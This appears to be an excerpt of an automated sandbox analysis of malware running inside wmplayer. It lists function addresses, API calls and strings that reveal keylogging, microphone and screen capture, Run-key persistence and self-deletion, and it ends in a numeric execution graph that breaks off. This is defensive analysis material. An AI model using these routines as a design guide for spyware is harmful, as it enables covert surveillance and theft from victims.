                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                            • String ID: image/png
                                                                                            • API String ID: 1291196975-2966254431
                                                                                            • Opcode ID: 237698dc32514766c1fad297d1dce59c0e96963289857c2210f17381393a4e10
                                                                                            • Instruction ID: e3b7944e5392015f30009faa46d0af48502643625c308f0969f1fef2cb3c76d4
                                                                                            • Opcode Fuzzy Hash: 237698dc32514766c1fad297d1dce59c0e96963289857c2210f17381393a4e10
                                                                                            • Instruction Fuzzy Hash: AA21A135204211AFC300AF61CC88CAFBBBDEFCA714F10052EF90693151DB399945CBA6
                                                                                            Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                            Strings
                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LocalTime
                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                            • API String ID: 481472006-1507639952
                                                                                            • Opcode ID: ef17581a39fbd391229547539f15d99c33dd27b8bec5d6813d4c4f21374c3312
                                                                                            • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                            • Opcode Fuzzy Hash: ef17581a39fbd391229547539f15d99c33dd27b8bec5d6813d4c4f21374c3312
                                                                                            • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                            Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: : $Se.
                                                                                            • API String ID: 4218353326-4089948878
                                                                                            • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                            • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                            • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                            • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                            Function 0041A686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LocalTime
                                                                                            • String ID: | $%02i:%02i:%02i:%03i
                                                                                            • API String ID: 481472006-2430845779
                                                                                            • Opcode ID: 298a8fa4a0a4a1ca75070d71eab88c5053a9fb91c71f84409335018714d5b4ac
                                                                                            • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                            • Opcode Fuzzy Hash: 298a8fa4a0a4a1ca75070d71eab88c5053a9fb91c71f84409335018714d5b4ac
                                                                                            • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                            Function 00419E89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExistsFilePath
                                                                                            • String ID: alarm.wav$xIG
                                                                                            • API String ID: 1174141254-4080756945
                                                                                            • Opcode ID: f5f924f0131290973494a8e0eadf160ea67a5e7c1f667f795b35b3652c8962bf
                                                                                            • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                            • Opcode Fuzzy Hash: f5f924f0131290973494a8e0eadf160ea67a5e7c1f667f795b35b3652c8962bf
                                                                                            • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                            Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                            • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                            • String ID: Online Keylogger Stopped
                                                                                            • API String ID: 1623830855-1496645233
                                                                                            • Opcode ID: 4e19c90638ad7668d8382ed65e6b3a2ca1ac7df57cc043217804cdfd39f05b44
                                                                                            • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                            • Opcode Fuzzy Hash: 4e19c90638ad7668d8382ed65e6b3a2ca1ac7df57cc043217804cdfd39f05b44
                                                                                            • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                            Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                              • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                            • String ID: Unknown exception
                                                                                            • API String ID: 3476068407-410509341
                                                                                            • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                            • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                            • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                            • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                            Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • waveInPrepareHeader.WINMM(00D852E0,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                            • waveInAddBuffer.WINMM(00D852E0,00000020,?,00000000,00401913), ref: 0040175D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: wave$BufferHeaderPrepare
                                                                                            • String ID: T=G
                                                                                            • API String ID: 2315374483-379896819
                                                                                            • Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                            • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                            • Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                            • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                            Function 00447790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LocaleValid
                                                                                            • String ID: IsValidLocaleName$j=D
                                                                                            • API String ID: 1901932003-3128777819
                                                                                            • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                            • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                            • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                            • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                            Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID: T=G$T=G
                                                                                            • API String ID: 3519838083-3732185208
                                                                                            • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                            • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                                            • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                            • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                                            Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                              • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                              • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                              • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                              • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                              • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                            • String ID: [AltL]$[AltR]
                                                                                            • API String ID: 2738857842-2658077756
                                                                                            • Opcode ID: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                            • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                            • Opcode Fuzzy Hash: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                            • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                            Function 00448803 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00448825
                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorFreeHeapLast_free
                                                                                            • String ID: `@$`@
                                                                                            • API String ID: 1353095263-20545824
                                                                                            • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                            • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                            • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                            • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                            Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: State
                                                                                            • String ID: [CtrlL]$[CtrlR]
                                                                                            • API String ID: 1649606143-2446555240
                                                                                            • Opcode ID: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                            • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                            • Opcode Fuzzy Hash: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                            • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                            Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                            • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DeleteOpenValue
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                            • API String ID: 2654517830-1051519024
                                                                                            • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                            • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                            • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                            • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                            Function 0040AF77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DeleteDirectoryFileRemove
                                                                                            • String ID: pth_unenc
                                                                                            • API String ID: 3325800564-4028850238
                                                                                            • Opcode ID: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                            • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                            • Opcode Fuzzy Hash: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                            • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                            Function 00411699 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                            • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ObjectProcessSingleTerminateWait
                                                                                            • String ID: pth_unenc
                                                                                            • API String ID: 1872346434-4028850238
                                                                                            • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                            • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                            • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                            • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                            Function 0043FA5E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                            • GetLastError.KERNEL32 ref: 0043FB02
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1717984340-0
                                                                                            • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                            • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                            • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                            • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759

                                                                                            Execution Graph

                                                                                            Execution Coverage:6.4%
                                                                                            Dynamic/Decrypted Code Coverage:9.2%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:2000
                                                                                            Total number of Limit Nodes:84
                                                                                            execution_graph 40350 441819 40353 430737 40350->40353 40352 441825 40354 430756 40353->40354 40366 43076d 40353->40366 40355 430774 40354->40355 40356 43075f 40354->40356 40367 43034a 40355->40367 40378 4169a7 11 API calls 40356->40378 40359 4307ce 40360 430819 memset 40359->40360 40371 415b2c 40359->40371 40360->40366 40361 43077e 40361->40359 40364 4307fa 40361->40364 40361->40366 40363 4307e9 40363->40360 40363->40366 40379 4169a7 11 API calls 40364->40379 40366->40352 40368 430359 40367->40368 40369 43034e 40367->40369 40368->40361 40380 415c23 memcpy 40369->40380 40372 415b46 40371->40372 40373 415b42 40371->40373 40372->40363 40373->40372 40374 415b94 40373->40374 40375 415b5a 40373->40375 40376 4438b5 10 API calls 40374->40376 40375->40372 40377 415b79 memcpy 40375->40377 40376->40372 40377->40372 40378->40366 40379->40366 40380->40368 37675 442ec6 19 API calls 37849 4152c6 malloc 37850 4152e2 37849->37850 37851 4152ef 37849->37851 37853 416760 11 API calls 37851->37853 37853->37850 37854 4466f4 37873 446904 37854->37873 37856 446700 GetModuleHandleA 37859 446710 __set_app_type __p__fmode __p__commode 37856->37859 37858 4467a4 37860 4467ac __setusermatherr 37858->37860 37861 4467b8 37858->37861 37859->37858 37860->37861 37874 4468f0 _controlfp 37861->37874 37863 4467bd _initterm __wgetmainargs _initterm 37865 44681e GetStartupInfoW 37863->37865 37866 446810 37863->37866 37867 446866 GetModuleHandleA 37865->37867 37875 41276d 37867->37875 37871 446896 exit 37872 44689d _cexit 37871->37872 37872->37866 37873->37856 37874->37863 37876 41277d 37875->37876 37918 4044a4 LoadLibraryW 37876->37918 37878 412785 37909 412789 37878->37909 37926 414b81 37878->37926 37881 4127c8 37932 412465 memset ??2@YAPAXI 37881->37932 37883 4127ea 37944 40ac21 37883->37944 37888 412813 37962 40dd07 memset 37888->37962 37889 412827 37967 40db69 memset 37889->37967 37893 412822 37988 4125b6 ??3@YAXPAX 37893->37988 37894 40ada2 _wcsicmp 37895 41283d 37894->37895 37895->37893 37898 412863 CoInitialize 37895->37898 37972 41268e 37895->37972 37992 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37898->37992 37902 41296f 37994 40b633 37902->37994 37904 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37910 412957 CoUninitialize 37904->37910 37915 4128ca 37904->37915 37909->37871 37909->37872 